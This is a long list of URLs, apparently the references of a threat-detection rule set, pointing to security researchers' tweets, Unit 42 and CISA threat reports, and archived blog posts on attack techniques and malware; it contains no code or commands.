https://twitter.com/0gtweet/status/1638069413717975046\nhttps://twitter.com/0gtweet/status/1666716511988330499\nhttps://twitter.com/0gtweet/status/1674399582162153472\nhttps://twitter.com/0gtweet/status/1720419490519752955\nhttps://twitter.com/0xBoku/status/1679200664013135872\nhttps://twitter.com/0xrawsec/status/1002478725605273600?s=21\nhttps://twitter.com/1kwpeter/status/1397816101455765504\nhttps://twitter.com/1ZRR4H/status/1534259727059787783\nhttps://twitter.com/1ZRR4H/status/1537501582727778304\nhttps://twitter.com/200_okay_/status/1194765831911215104\nhttps://twitter.com/_0xf4n9x_/status/1572052954538192901\nhttps://twitter.com/_dirkjan/status/1309214379003588608\nhttps://twitter.com/_felamos/status/1179811992841797632\nhttps://twitter.com/_felamos/status/1204705548668555264\nhttps://twitter.com/_JohnHammond/status/1531672601067675648\nhttps://twitter.com/_JohnHammond/status/1588155401752788994\nhttps://twitter.com/_JohnHammond/status/1708910264261980634\nhttps://twitter.com/_nullbind/status/1204923340810543109\nhttps://twitter.com/_st0pp3r_/status/1560072680887525378\nhttps://twitter.com/_st0pp3r_/status/1583914244344799235\nhttps://twitter.com/_st0pp3r_/status/1583914515996897281\nhttps://twitter.com/_st0pp3r_/status/1583922009842802689\nhttps://twitter.com/_vivami/status/1347925307643355138\nhttps://twitter.com/_xpn_/status/1268712093928378368\nhttps://twitter.com/_xpn_/status/1491557187168178176\nhttps://twitter.com/aboul3la/status/1286012324722155525\nhttps://twitter.com/aceresponder/status/1636116096506818562\nhttps://twitter.com/AdamTheAnalyst/status/1134394070045003776\nhttps://twitter.com/AdamTheAnalyst/status/1483497517119590403\nhttps://twitter.com/Al1ex4/status/1382981479727128580\nhttps://twitter.com/Alh4zr3d/status/1566489367232651264\nhttps://twitter.com/Alh4zr3d/status/1580925761996828672\nhttps://twitter.com/am0nsec/status/1412232114980982787\nhttps://twitter.com/an0n_r0/status/1474698356635193346?s=12\nhttps://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A\nhttps://twitter.com/anfam17/status/1607477672057208835\nhttps://twitter.com/ankit_anubhav/status/1518835408502620162\nhttps://twitter.com/ber_m1ng/status/1397948048135778309\nhttps://twitter.com/bh4b3sh/status/1303674603819081728\nhttps://twitter.com/bigmacjpg/status/1349727699863011328?s=12\nhttps://twitter.com/bl4sty/status/1445462677824761878\nhttps://twitter.com/blackarrowsec/status/1463805700602224645?s=12\nhttps://twitter.com/blackorbird/status/1140519090961825792\nhttps://twitter.com/BleepinComputer/status/1372218235949617161\nhttps://twitter.com/bohops/status/1276357235954909188?s=12\nhttps://twitter.com/bohops/status/1477717351017680899?s=12\nhttps://twitter.com/bohops/status/1583916360404729857\nhttps://twitter.com/bohops/status/1635288066909966338\nhttps://twitter.com/bohops/status/1740022869198037480\nhttps://twitter.com/bohops/status/948061991012327424\nhttps://twitter.com/bohops/status/980659399495741441\nhttps://twitter.com/bohops/status/994405551751815170\nhttps://twitter.com/bopin2020/status/1366400799199272960\nhttps://twitter.com/breakersall/status/1533493587828260866\nhttps://twitter.com/bryon_/status/975835709587075072\nhttps://twitter.com/Carlos_Perez/status/883455096645931008\nhttps://twitter.com/cglyer/status/1182389676876980224\nhttps://twitter.com/cglyer/status/1182391019633029120\nhttps://twitter.com/cglyer/status/1183756892952248325\nhttps://twitter.com/cglyer/status/1355171195654709249\nhttps://twitter.com/chadtilbury/status/1275851297770610688\nhttps://twitter.com/christophetd/status/1164506034720952320\nhttps://twitter.com/ClearskySec/status/960924755355369472\nhttps://twitter.com/countuponsec/status/910969424215232518\nhttps://twitter.com/countuponsec/status/910977826853068800\nhttps://twitter.com/craiu/status/1167358457344925696\nhttps://twitter.com/crep1x/status/1635034100213112833\nhttps://twitter.com/Cryptolaemus1/status/1517634855940632576\nhttps://twitter.com/cube0x0/status/1418920190759378944\nhttps://twitter.com/cyb3rops/status/1063072865992523776\nhttps://twitter.com/cyb3rops/status/1096842275437625346\nhttps://twitter.com/cyb3rops/status/1168863899531132929\nhttps://twitter.com/cyb3rops/status/1186631731543236608\nhttps://twitter.com/cyb3rops/status/1460978167628406785\nhttps://twitter.com/cyb3rops/status/1514217991034097664\nhttps://twitter.com/cyb3rops/status/1552932770464292864\nhttps://twitter.com/cyb3rops/status/1562072617552678912\nhttps://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA\nhttps://twitter.com/cyb3rops/status/1617108657166061568?s=20\nhttps://twitter.com/cyb3rops/status/1659175181695287297\nhttps://twitter.com/cyb3rops/status/972186477512839170\nhttps://twitter.com/Cyb3rWard0g/status/1381642789369286662\nhttps://twitter.com/Cyb3rWard0g/status/1453123054243024897\nhttps://twitter.com/CyberRaiju/status/1251492025678983169\nhttps://twitter.com/CyberRaiju/status/1273597319322058752\nhttps://twitter.com/cyberwar_15/status/1187287262054076416\nhttps://twitter.com/d1r4c/status/1279042657508081664\nhttps://twitter.com/D1rkMtr/status/1611471891193298944?s=20\nhttps://twitter.com/d4rksystem/status/1357010969264873472\nhttps://twitter.com/davisrichardg/status/1616518800584704028\nhttps://twitter.com/deviouspolack/status/832535435960209408\nhttps://twitter.com/dez_/status/1560101453150257154\nhttps://twitter.com/dez_/status/986614411711442944\nhttps://twitter.com/DidierStevens/status/1217533958096924676\nhttps://twitter.com/DissectMalware/status/1062879286749773824\nhttps://twitter.com/DissectMalware/status/998797808907046913\nhttps://twitter.com/dottor_morte/status/1544652325570191361\nhttps://twitter.com/DrunkBinary/status/1063075530180886529\nhttps://twitter.com/DTCERT/status/1712785421845790799\nhttps://twitter.com/DTCERT/status/1712785426895839339\nhttps://twitter.com/duff22b/status/1280166329660497920\nhttps://twitter.com/duzvik/status/1269671601852813320\nhttps://twitter.com/egre55/status/1087685529016193025\nhttps://twitter.com/elliotkillick/status/1449812843772227588\nhttps://twitter.com/EmericNasi/status/1623224526220804098\nhttps://twitter.com/eral4m/status/1451112385041911809\nhttps://twitter.com/eral4m/status/1479080793003671557\nhttps://twitter.com/eral4m/status/1479106975967240209\nhttps://twitter.com/eral4m/status/1480468728324231172?s=20\nhttps://twitter.com/EricaZelic/status/1614075109827874817\nhttps://twitter.com/felixw3000/status/853354851128025088\nhttps://twitter.com/ffforward/status/1481672378639912960\nhttps://twitter.com/filip_dragovic/status/1590052248260055041\nhttps://twitter.com/filip_dragovic/status/1590104354727436290\nhttps://twitter.com/Flangvik/status/1283054508084473861\nhttps://twitter.com/FlemmingRiis/status/1217147415482060800\nhttps://twitter.com/ForensicITGuy/status/1334734244120309760\nhttps://twitter.com/forensicitguy/status/1513538712986079238\nhttps://twitter.com/fr0s7_/status/1712780207105404948\nhttps://twitter.com/frack113/status/1555830623633375232\nhttps://twitter.com/fuzzyf10w/status/1410202370835898371\nhttps://twitter.com/GadixCRK/status/1369313704869834753?s=20\nhttps://twitter.com/Gal_B1t/status/1062971006078345217\nhttps://twitter.com/gbti_sa/status/1249653895900602375?lang=en\nhttps://twitter.com/GelosSnake/status/934900723426439170\nhttps://twitter.com/gentilkiwi/status/1003236624925413376\nhttps://twitter.com/gentilkiwi/status/861641945944391680\nhttps://twitter.com/gN3mes1s/status/1206874118282448897\nhttps://twitter.com/gN3mes1s/status/1222088214581825540\nhttps://twitter.com/gN3mes1s/status/1222095371175911424\nhttps://twitter.com/gN3mes1s/status/1222095963789111296\nhttps://twitter.com/gN3mes1s/status/941315826107510784\nhttps://twitter.com/GossiTheDog/status/1392965209132871683?s=20\nhttps://twitter.com/GossiTheDog/status/1429175908905127938\nhttps://twitter.com/h4x0r_dz/status/1445401960371429381\nhttps://twitter.com/hackerfantastic/status/1616455335203438592?s=20\nhttps://twitter.com/hakluke/status/1587733971814977537/photo/1\nhttps://twitter.com/harr0ey/status/989617817849876488\nhttps://twitter.com/harr0ey/status/991670870384021504\nhttps://twitter.com/harr0ey/status/992008180904419328\nhttps://twitter.com/Hexacorn/status/1224848930795552769\nhttps://twitter.com/Hexacorn/status/1420053502554951689\nhttps://twitter.com/hexacorn/status/1448037865435320323\nhttps://twitter.com/Hexacorn/status/776122138063409152\nhttps://twitter.com/Hexacorn/status/885258886428725250\nhttps://twitter.com/Hexacorn/status/885553465417756673\nhttps://twitter.com/Hexacorn/status/885570278637678592\nhttps://twitter.com/Hexacorn/status/991447379864932352\nhttps://twitter.com/hFireF0X/status/897640081053364225\nhttps://twitter.com/httpvoid0x2f/status/1532924261035384832\nhttps://twitter.com/HunterPlaybook/status/1301207718355759107\nhttps://twitter.com/INIT_3/status/1410662463641731075\nhttps://twitter.com/inversecos/status/1494174785621819397\nhttps://twitter.com/ItsReallyNick/status/1094080242686312448\nhttps://twitter.com/j00sean/status/1537750439701225472\nhttps://twitter.com/j0nh4t/status/1429049506021138437\nhttps://twitter.com/jackcr/status/807385668833968128\nhttps://twitter.com/JAMESWT_MHT/status/1699042827261391247\nhttps://twitter.com/jamieantisocial/status/1304520651248668673\nhttps://twitter.com/jas502n/status/1321416053050667009?s=20\nhttps://twitter.com/jhencinski/status/1102695118455349248\nhttps://twitter.com/JohnLaTwC/status/1004895028995477505\nhttps://twitter.com/JohnLaTwC/status/1082851155481288706\nhttps://twitter.com/JohnLaTwC/status/1223292479270600706\nhttps://twitter.com/johnlatwc/status/1408062131321270282?s=12\nhttps://twitter.com/JohnLaTwC/status/1415295021041979392\nhttps://twitter.com/JohnLaTwC/status/835149808817991680\nhttps://twitter.com/JohnLaTwC/status/837743453039534080\nhttps://twitter.com/JohnLaTwC/status/850381440629981184\nhttps://twitter.com/jonasLyk/status/1347900440000811010\nhttps://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19\nhttps://twitter.com/jonasLyk/status/1555914501802921984\nhttps://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nhttps://twitter.com/jseerden/status/1247985304667066373/photo/1\nhttps://twitter.com/kagancapar/status/1515219358234161153\nhttps://twitter.com/kevin_backhouse/status/1666459308941357056?s=20\nhttps://twitter.com/KevTheHermit/status/1410203844064301056\nhttps://twitter.com/killamjr/status/1179034907932315648\nhttps://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q\nhttps://twitter.com/kleiton0x7e/status/1600567316810551296\nhttps://twitter.com/kmkz_security/status/1220694202301976576\nhttps://twitter.com/Kostastsale/status/1565257924204986369\nhttps://twitter.com/Kostastsale/status/1646256901506605063?s=20\nhttps://twitter.com/Kostastsale/status/1700965142828290260\nhttps://twitter.com/lefterispan/status/1286259016436514816\nhttps://twitter.com/luc4m/status/1073181154126254080\nhttps://twitter.com/m417z/status/1566674631788007425\nhttps://twitter.com/M_haggis/status/1032799638213066752\nhttps://twitter.com/M_haggis/status/1699056847154725107\nhttps://twitter.com/M_haggis/status/900741347035889665\nhttps://twitter.com/MaD_c4t/status/1623414582382567424\nhttps://twitter.com/malmoeb/status/1511760068743766026\nhttps://twitter.com/malmoeb/status/1525901219247845376\nhttps://twitter.com/malmoeb/status/1535142803075960832\nhttps://twitter.com/malmoeb/status/1550483085472432128\nhttps://twitter.com/malmoeb/status/1560536653709598721\nhttps://twitter.com/malmoeb/status/1570814999370801158\nhttps://twitter.com/malmoeb/status/1616702107242971144\nhttps://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w\nhttps://twitter.com/MalwareJake/status/1410421967463731200\nhttps://twitter.com/MalwareJake/status/870349480356454401\nhttps://twitter.com/malwrhunterteam/status/1235135745611960321\nhttps://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2\nhttps://twitter.com/mariuszbit/status/1531631015139102720\nhttps://twitter.com/matthewdunwoody/status/1352356685982146562\nhttps://twitter.com/matthieugarin/status/1183970598210412546\nhttps://twitter.com/mattifestation/status/1196390321783025666\nhttps://twitter.com/mattifestation/status/1326228491302563846\nhttps://twitter.com/mattifestation/status/899646620148539397\nhttps://twitter.com/mattifestation/status/986280382042595328\nhttps://twitter.com/max_mal_/status/1542461200797163522\nhttps://twitter.com/Max_Mal_/status/1633863678909874176\nhttps://twitter.com/Max_Mal_/status/1661322732456353792\nhttps://twitter.com/Max_Mal_/status/1775222576639291859\nhttps://twitter.com/med0x2e/status/1520402518685200384\nhttps://twitter.com/menasec1/status/1104489274387451904\nhttps://twitter.com/menasec1/status/1106899890377052160\nhttps://twitter.com/menasec1/status/1111556090137903104\nhttps://twitter.com/mgreen27/status/1558223256704122882\nhttps://twitter.com/MichalKoczwara/status/1553634816016498688\nhttps://twitter.com/momika233/status/1626464189261942786\nhttps://twitter.com/Moriarty_Meng/status/984380793383370752\nhttps://twitter.com/Moti_B/status/1008587936735035392\nhttps://twitter.com/Moti_B/status/909449115477659651\nhttps://twitter.com/mpgn_x64/status/1216787131210829826\nhttps://twitter.com/mrd0x/status/1460597833917251595\nhttps://twitter.com/mrd0x/status/1460815932402679809\nhttps://twitter.com/mrd0x/status/1461041276514623491\nhttps://twitter.com/mrd0x/status/1463526834918854661\nhttps://twitter.com/mrd0x/status/1465058133303246867\nhttps://twitter.com/mrd0x/status/1475085452784844803?s=12\nhttps://twitter.com/mrd0x/status/1478116126005641220\nhttps://twitter.com/mrd0x/status/1478234484881436672?s=12\nhttps://twitter.com/mrd0x/status/1479094189048713219\nhttps://twitter.com/mrd0x/status/1480785527901204481\nhttps://twitter.com/mrd0x/status/1481630810495139841?s=12\nhttps://twitter.com/mrd0x/status/1511415432888131586\nhttps://twitter.com/mrd0x/status/1511489821247684615\nhttps://twitter.com/MsftSecIntel/status/1257324139515269121\nhttps://twitter.com/MsftSecIntel/status/1737895710169628824\nhttps://twitter.com/mttaggart/status/1511804863293784064\nhttps://twitter.com/mvelazco/status/1410291741241102338\nhttps://twitter.com/n1nj4sec/status/1421190238081277959\nhttps://twitter.com/nao_sec/status/1530196847679401984\nhttps://twitter.com/nas_bench/status/1433344116071583746\nhttps://twitter.com/nas_bench/status/1534915321856917506\nhttps://twitter.com/nas_bench/status/1534916659676422152\nhttps://twitter.com/nas_bench/status/1534957360032120833\nhttps://twitter.com/nas_bench/status/1535322182863179776\nhttps://twitter.com/nas_bench/status/1535322445439180803\nhttps://twitter.com/nas_bench/status/1535322450858233858\nhttps://twitter.com/nas_bench/status/1535431474429808642\nhttps://twitter.com/nas_bench/status/1535663791362519040\nhttps://twitter.com/nas_bench/status/1535981653239255040\nhttps://twitter.com/nas_bench/status/1537563834478645252\nhttps://twitter.com/nas_bench/status/1537896324837781506\nhttps://twitter.com/nas_bench/status/1537919885031772161\nhttps://twitter.com/nas_bench/status/1539679555908141061\nhttps://twitter.com/nas_bench/status/1550836225652686848\nhttps://twitter.com/nas_bench/status/1618021415852335105\nhttps://twitter.com/nas_bench/status/1618021838407495681\nhttps://twitter.com/nas_bench/status/1626648985824788480\nhttps://twitter.com/NathanMcNulty/status/1569497348841287681\nhttps://twitter.com/NathanMcNulty/status/1785051227568632263\nhttps://twitter.com/neonprimetime/status/1435584010202255375\nhttps://twitter.com/neonprimetime/status/1436376497980428318\nhttps://twitter.com/neu5ron/status/1346245602502443009\nhttps://twitter.com/neu5ron/status/1438987292971053057?s=20\nhttps://twitter.com/NinjaParanoid/status/1516442028963659777\nhttps://twitter.com/notwhickey/status/1333900137232523264\nhttps://twitter.com/Oddvarmoe/status/1270633613449723905\nhttps://twitter.com/Oddvarmoe/status/1641712700605513729\nhttps://twitter.com/Oddvarmoe/status/985518877076541440\nhttps://twitter.com/Oddvarmoe/status/993383596244258816\nhttps://twitter.com/orange_8361/status/1518970259868626944\nhttps://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw\nhttps://twitter.com/ORCA6665/status/1496478087244095491\nhttps://twitter.com/oroneequalsone/status/1568432028361830402\nhttps://twitter.com/OTR_Community/status/1371053369071132675\nhttps://twitter.com/oulusoyum/status/1191329746069655553\nhttps://twitter.com/pabraeken/status/990717080805789697\nhttps://twitter.com/pabraeken/status/990758590020452353\nhttps://twitter.com/pabraeken/status/991335019833708544\nhttps://twitter.com/pabraeken/status/993298228840992768\nhttps://twitter.com/pabraeken/status/993497996179492864\nhttps://twitter.com/pabraeken/status/995837734379032576\nhttps://twitter.com/pabraeken/status/998627081360695297\nhttps://twitter.com/pabraeken/status/999090532839313408\nhttps://twitter.com/parzel2/status/1665726454489915395\nhttps://twitter.com/pfiatde/status/1681977680688738305\nhttps://twitter.com/PhilipTsukerman/status/992021361106268161\nhttps://twitter.com/ptswarm/status/1445376079548624899\nhttps://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw\nhttps://twitter.com/Purp1eW0lf/status/1616144561965002752\nhttps://twitter.com/pyn3rd/status/1020620932967223296\nhttps://twitter.com/pyn3rd/status/1351696768065409026\nhttps://twitter.com/PythonResponder/status/1385064506049630211\nhttps://twitter.com/pythonresponder/status/1385064506049630211?s=21\nhttps://twitter.com/r00tbsd/status/1679042071477338114/photo/1\nhttps://twitter.com/rbmaslen/status/1321859647091970051\nhttps://twitter.com/ReaQta/status/1222548288731217921\nhttps://twitter.com/RedDrip7/status/1506480588827467785\nhttps://twitter.com/ReneFreingruber/status/1172244989335810049\nhttps://twitter.com/rikvduijn/status/853251879320662017\nhttps://twitter.com/RonnyTNL/status/1436334640617373699?s=20\nhttps://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03\nhttps://twitter.com/Sam0x90/status/1552011547974696960\nhttps://twitter.com/sblmsrsn/status/1445758411803480072?s=20\nhttps://twitter.com/sblmsrsn/status/1456613494783160325?s=20\nhttps://twitter.com/SBousseaden/status/1090588499517079552\nhttps://twitter.com/SBousseaden/status/1096148422984384514\nhttps://twitter.com/SBousseaden/status/1101431884540710913\nhttps://twitter.com/SBousseaden/status/1139811587760562176\nhttps://twitter.com/SBousseaden/status/1167417096374050817\nhttps://twitter.com/SBousseaden/status/1183745981189427200\nhttps://twitter.com/SBousseaden/status/1184067445612535811\nhttps://twitter.com/SBousseaden/status/1189469425482829824\nhttps://twitter.com/SBousseaden/status/1195284233729777665\nhttps://twitter.com/SBousseaden/status/1207671369963646976\nhttps://twitter.com/SBousseaden/status/1211636381086339073\nhttps://twitter.com/SBousseaden/status/1278977301745741825\nhttps://twitter.com/sbousseaden/status/1282441816986484737?s=12\nhttps://twitter.com/SBousseaden/status/1387530414185664538\nhttps://twitter.com/SBousseaden/status/1387743867663958021\nhttps://twitter.com/SBousseaden/status/1410545674773467140\nhttps://twitter.com/sbousseaden/status/1429401053229891590?s=12\nhttps://twitter.com/SBousseaden/status/1429530155291193354?s=20\nhttps://twitter.com/SBousseaden/status/1451237393017839616\nhttps://twitter.com/SBousseaden/status/1464566846594691073?s=20\nhttps://twitter.com/SBousseaden/status/1483810148602814466\nhttps://twitter.com/SBousseaden/status/1490608838701166596\nhttps://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g\nhttps://twitter.com/sbousseaden/status/1523383197513379841\nhttps://twitter.com/sbousseaden/status/1531653369546301440\nhttps://twitter.com/SBousseaden/status/1541920424635912196\nhttps://twitter.com/sbousseaden/status/1555200155351228419\nhttps://twitter.com/SBousseaden/status/1581300963650187264?\nhttps://twitter.com/ScumBots/status/1610626724257046529\nhttps://twitter.com/sec715/status/1373472323538362371\nhttps://twitter.com/SecurePeacock/status/1486054048390332423?s=20\nhttps://twitter.com/SecurityJosh/status/1283027365770276866\nhttps://twitter.com/ShadowChasing1/status/1552595370961944576\nhttps://twitter.com/shantanukhande/status/1229348874298388484\nhttps://twitter.com/shutingrz/status/1469255861394866177?s=21\nhttps://twitter.com/splinter_code/status/1420546784250769408\nhttps://twitter.com/splinter_code/status/1483815103279603714\nhttps://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g\nhttps://twitter.com/standa_t/status/1808868985678803222\nhttps://twitter.com/StopMalvertisin/status/1648604148848549888\nhttps://twitter.com/stvemillertime/status/1024707932447854592\nhttps://twitter.com/subTee/status/1216465628946563073\nhttps://twitter.com/subTee/status/891298217907830785\nhttps://twitter.com/sudo_sudoka/status/1323951871078223874\nhttps://twitter.com/SwiftOnSecurity/status/1455897435063074824\nhttps://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\nhttps://twitter.com/t3ft3lb/status/1656194831830401024\nhttps://twitter.com/tccontre18/status/1480950986650832903\nhttps://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\nhttps://twitter.com/th3_protoCOL/status/1480621526764322817\nhttps://twitter.com/TheDFIRReport/status/1423361119926816776?s=20\nhttps://twitter.com/TheDFIRReport/status/1482078434327244805\nhttps://twitter.com/tifkin_/status/1321916444557365248\nhttps://twitter.com/timbmsft/status/900724491076214784\nhttps://twitter.com/VakninHai/status/1517027824984547329\nhttps://twitter.com/vanitasnk/status/1437329511142420483?s=21\nhttps://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19\nhttps://twitter.com/VM_vivisector/status/1217190929330655232\nhttps://twitter.com/vxunderground/status/1423336151860002816\nhttps://twitter.com/vxunderground/status/1423336151860002816?s=20\nhttps://twitter.com/vysecurity/status/873181705024266241\nhttps://twitter.com/vysecurity/status/885545634958385153\nhttps://twitter.com/vysecurity/status/974806438316072960\nhttps://twitter.com/vysecurity/status/977198418354491392\nhttps://twitter.com/wdormann/status/1347958161609809921\nhttps://twitter.com/wdormann/status/1478011052130459653?s=20\nhttps://twitter.com/wdormann/status/1486161836961579020\nhttps://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw\nhttps://twitter.com/wdormann/status/1547583317410607110\nhttps://twitter.com/wdormann/status/1590434950335320065\nhttps://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09\nhttps://twitter.com/wdormann/status/1679184475677130755\nhttps://twitter.com/WhichbufferArda/status/1543900539280293889\nhttps://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2\nhttps://twitter.com/WhichbufferArda/status/1658829954182774784\nhttps://twitter.com/Wietze/status/1542107456507203586\nhttps://twitter.com/WindowsDocs/status/1620078135080325122\nhttps://twitter.com/wugeej/status/1369476795255320580\nhttps://twitter.com/x86matthew/status/1505476263464607744?s=12\nhttps://twitter.com/xorJosh/status/1598646907802451969\nhttps://twitter.com/Yasser_Elsnbary/status/1553804135354564608\nhttps://twitter.com/yorickkoster/status/1279709009151434754\nhttps://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20\nhttps://twitter.com/Z3Jpa29z/status/1317545798981324801\nhttps://unicode-explorer.com/c/202E\nhttps://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nhttps://unit42.paloaltonetworks.com/bluesky-ransomware/\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\nhttps://unit42.paloaltonetworks.com/cloaked-ursa-phishing/\nhttps://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nhttps://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\nhttps://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\nhttps://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/\nhttps://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/\nhttps://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/\nhttps://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/\nhttps://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/\nhttps://unit42.paloaltonetworks.com/ransomware-families/\nhttps://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\nhttps://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/\nhttps://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/\nhttps://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution\nhttps://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\nhttps://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/\nhttps://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/\nhttps://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/\nhttps://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true\nhttps://us-cert.cisa.gov/ncas/alerts/aa21-008a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\nhttps://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png\nhttps://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html\nhttps://vanmieghem.io/stealth-outlook-persistence/\nhttps://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx\nhttps://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/\nhttps://vk9-sec.com/hfs-code-execution-cve-2014-6287/\nhttps://vms.drweb.fr/virus/?i=24144899\nhttps://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224\nhttps://vulncheck.com/blog/real-world-cve-2023-43261\nhttps://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf\nhttps://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/\nhttps://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nhttps://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/\nhttps://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html\nhttps://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\nhttps://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html\nhttps://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\nhttps://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nhttps://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf\nhttps://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nhttps://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf\nhttps://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html\nhttps://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/\nhttps://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf\nhttps://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708\nhttps://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nhttps://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\nhttps://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464\nhttps://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\nhttps://web.archive.org/web/20200226212615/https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf\nhttps://web.archive.org/web/20200226212615/https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/\nhttps://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf\nhttps://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf\nhttps://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation\nhttps://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nhttps://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua\nhttps://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf\nhttps://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866\nhttps://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html\nhttps://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html\nhttps://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap\nhttps://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vp